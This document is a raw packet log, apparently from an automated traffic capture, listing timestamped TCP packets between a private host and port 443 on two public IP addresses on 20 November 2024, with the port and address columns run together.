                                                                                                                                                                                                                      Nov 20, 2024 17:42:22.820952892 CET4434995113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:22.875998974 CET49932443192.168.2.720.12.23.50
                                                                                                                                                                                                                      Nov 20, 2024 17:42:22.919337034 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.034354925 CET4434994113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.034451008 CET4434994113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.034507036 CET49941443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.037899971 CET49941443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.037931919 CET4434994113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.037956953 CET49941443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.037971020 CET4434994113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.057353020 CET49954443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.057383060 CET4434995413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.057473898 CET49954443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.058309078 CET49954443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.058329105 CET4434995413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.112593889 CET4434994213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.116746902 CET4434994213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.116803885 CET49942443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.116812944 CET4434994213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.116861105 CET49942443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.116939068 CET49942443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.116957903 CET4434994213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.116975069 CET49942443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.116982937 CET4434994213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.119875908 CET49955443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.119913101 CET4434995513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.119976044 CET49955443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.120258093 CET49955443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.120271921 CET4434995513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434175014 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434201956 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434210062 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434278965 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434292078 CET49932443192.168.2.720.12.23.50
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434319973 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434346914 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434384108 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434408903 CET49932443192.168.2.720.12.23.50
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434408903 CET49932443192.168.2.720.12.23.50
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434408903 CET49932443192.168.2.720.12.23.50
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.434432983 CET49932443192.168.2.720.12.23.50
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.477741003 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.477866888 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.477901936 CET49932443192.168.2.720.12.23.50
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.477911949 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:23.477966070 CET49932443192.168.2.720.12.23.50
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.550403118 CET4434995113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.550982952 CET49951443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.551023960 CET4434995113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.551512003 CET49951443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.551522970 CET4434995113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.607815981 CET4434994913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.608304977 CET49949443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.608341932 CET4434994913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.608699083 CET49949443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.608710051 CET4434994913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.746995926 CET49932443192.168.2.720.12.23.50
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.747076988 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.747137070 CET49932443192.168.2.720.12.23.50
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.747155905 CET4434993220.12.23.50192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.786776066 CET4434995413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.787297010 CET49954443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.787309885 CET4434995413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.789086103 CET49954443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.789098024 CET4434995413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.798964977 CET4434995013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.799447060 CET49950443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.799489021 CET4434995013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.800115108 CET49950443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:24.800122976 CET4434995013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.181720018 CET4434995513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.183681011 CET49955443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.183718920 CET4434995513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.213967085 CET49955443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.213978052 CET4434995513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.229099989 CET4434995113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.229268074 CET4434995113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.230716944 CET49951443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.230811119 CET49951443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.230811119 CET49951443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.230865002 CET4434995113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.230899096 CET4434995113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.233935118 CET49963443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.233983040 CET4434996313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.234158039 CET49963443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.234380007 CET49963443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.234395027 CET4434996313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.238245964 CET4434994913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.239269018 CET4434994913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.243232012 CET49949443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.244937897 CET49949443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.244961977 CET4434994913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.244977951 CET49949443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.244985104 CET4434994913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.371225119 CET4434995413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.371258020 CET4434995413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.371325970 CET4434995413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.371351004 CET49954443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.371486902 CET49954443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.373061895 CET4434995013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.373095036 CET4434995013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.373138905 CET49950443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.373147964 CET4434995013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.373162985 CET4434995013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.373209000 CET49950443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.472455025 CET49954443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.472455025 CET49954443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.472476006 CET4434995413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.472485065 CET4434995413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.473509073 CET49950443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.473535061 CET4434995013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.473547935 CET49950443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.473556042 CET4434995013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.479043007 CET49965443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.479147911 CET4434996513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.479238033 CET49965443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.480365038 CET49966443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.480391026 CET4434996613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.480459929 CET49966443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.481981039 CET49965443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.482039928 CET4434996513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.482424021 CET49966443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.482438087 CET4434996613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.483804941 CET49967443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.483856916 CET4434996713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.483921051 CET49967443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.484107971 CET49967443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.484138966 CET4434996713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.689232111 CET4434995513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.694025040 CET4434995513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.694367886 CET49955443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.694448948 CET49955443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.694472075 CET4434995513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.694483042 CET49955443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.694489002 CET4434995513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.697940111 CET49968443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.697988033 CET4434996813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.698057890 CET49968443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.698178053 CET49968443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:25.698193073 CET4434996813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.124896049 CET4434996313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.159712076 CET49963443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.159789085 CET4434996313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.161427975 CET49963443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.161442995 CET4434996313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.235937119 CET4434996713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.239769936 CET49967443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.239795923 CET4434996713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.240276098 CET49967443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.240281105 CET4434996713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.365619898 CET4434996513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.366247892 CET49965443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.366323948 CET4434996513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.367880106 CET49965443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.367896080 CET4434996513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.369661093 CET4434996613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.370202065 CET49966443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.370235920 CET4434996613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.370615959 CET49966443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.370620966 CET4434996613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.574227095 CET4434996813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.574703932 CET49968443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.574737072 CET4434996813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.575177908 CET49968443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.575192928 CET4434996813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.682209015 CET4434996313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.686316013 CET4434996313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.686381102 CET4434996313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.686471939 CET49963443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.686536074 CET49963443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.686554909 CET4434996313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.686563969 CET49963443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.686569929 CET4434996313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.690174103 CET49973443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.690215111 CET4434997313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.691237926 CET49973443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.691389084 CET49973443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.691396952 CET4434997313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.817409039 CET4434996713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.818945885 CET4434996713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.819088936 CET49967443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.861635923 CET49967443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.861655951 CET4434996713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.861669064 CET49967443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.861673117 CET4434996713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.871622086 CET49974443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.871643066 CET4434997413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.871715069 CET49974443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.871995926 CET49974443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.872004986 CET4434997413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.882600069 CET4434996613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.885845900 CET4434996613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.885901928 CET4434996613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.886004925 CET49966443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.886109114 CET49966443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.886123896 CET4434996613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.886137009 CET49966443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.886143923 CET4434996613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.889417887 CET49975443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.889435053 CET4434997513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.889492989 CET49975443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.889615059 CET49975443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.889626026 CET4434997513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.896955013 CET4434996513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.899821997 CET4434996513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.899879932 CET49965443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.899910927 CET49965443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.899918079 CET4434996513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.899931908 CET49965443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.899935961 CET4434996513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.901947975 CET49976443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.901971102 CET4434997613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.902153015 CET49976443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.902275085 CET49976443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:27.902288914 CET4434997613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.044873953 CET4434996813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.050570965 CET4434996813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.050632000 CET49968443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.115644932 CET49968443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.115675926 CET4434996813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.115686893 CET49968443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.115693092 CET4434996813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.120460987 CET49977443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.120486975 CET4434997713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.120543003 CET49977443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.120979071 CET49977443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.120990992 CET4434997713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.578603983 CET4434997313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.579725981 CET49973443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.579751968 CET4434997313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.581536055 CET49973443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.581542015 CET4434997313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.687500954 CET4434997513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.688016891 CET49975443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.688040972 CET4434997513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.689546108 CET49975443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.689549923 CET4434997513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.732203960 CET4434997413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.732562065 CET49974443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.732594967 CET4434997413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.732965946 CET49974443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.732973099 CET4434997413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.807049990 CET4434997613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.807702065 CET49976443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.807715893 CET4434997613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.808187962 CET49976443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.808195114 CET4434997613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.881122112 CET4434997713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.882662058 CET49977443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.882672071 CET4434997713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.883337975 CET49977443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:29.883342981 CET4434997713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.041002035 CET4434997313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.041788101 CET4434997313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.041846037 CET49973443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.041908026 CET49973443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.041930914 CET4434997313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.041945934 CET49973443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.041953087 CET4434997313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.045142889 CET49984443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.045229912 CET4434998413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.045352936 CET49984443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.045556068 CET49984443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.045592070 CET4434998413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.121819019 CET4434997513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.125168085 CET4434997513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.125243902 CET49975443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.125287056 CET49975443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.125287056 CET49975443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.125309944 CET4434997513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.125322104 CET4434997513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.128158092 CET49985443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.128246069 CET4434998513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.128333092 CET49985443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.128494024 CET49985443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.128526926 CET4434998513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.179522991 CET4434997413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.181107044 CET4434997413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.181168079 CET4434997413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:30.181189060 CET49974443192.168.2.713.107.246.63
